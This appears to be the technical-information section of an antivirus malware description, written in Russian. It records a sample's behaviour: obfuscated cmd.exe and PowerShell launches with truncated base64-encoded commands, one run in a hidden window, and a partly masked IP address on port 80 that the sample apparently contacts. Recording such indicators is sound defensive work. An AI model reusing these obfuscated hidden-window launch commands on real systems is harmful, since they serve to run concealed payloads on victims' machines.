Техническая информация
- '<SYSTEM32>\cmd.exe' /C PO^w^ErS^hE^Ll -e WwBzAFkAUwB0AGUATQAuAHQARQB4AHQALgBlAG4AQwBvAEQAaQBuAGcAXQA6ADoAVQBuAEkAQwBvAEQARQAuAGcAZQB0AHMAdABSAEkAbgBnACgAWwBTAHkAUwBUAGUATQAuAGMAbwBuAHYAZQBSAHQAXQA6ADoAZgBSAG8ATQBi...
- '46.##3.223.34':80
- '<SYSTEM32>\cmd.exe' /C PO^w^ErS^hE^Ll -e WwBzAFkAUwB0AGUATQAuAHQARQB4AHQALgBlAG4AQwBvAEQAaQBuAGcAXQA6ADoAVQBuAEkAQwBvAEQARQAuAGcAZQB0AHMAdABSAEkAbgBnACgAWwBTAHkAUwBUAGUATQAuAGMAbwBuAHYAZQBSAHQAXQA6ADoAZgBSAG8ATQBi...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e WwBzAFkAUwB0AGUATQAuAHQARQB4AHQALgBlAG4AQwBvAEQAaQBuAGcAXQA6ADoAVQBuAEkAQwBvAEQARQAuAGcAZQB0AHMAdABSAEkAbgBnACgAWwBTAHkAUwBUAGUATQAuAGMAbwBuAHYAZQBSAHQAXQA6ADoAZgBSAG8ATQBiAEEAcwBlADYANABTAH...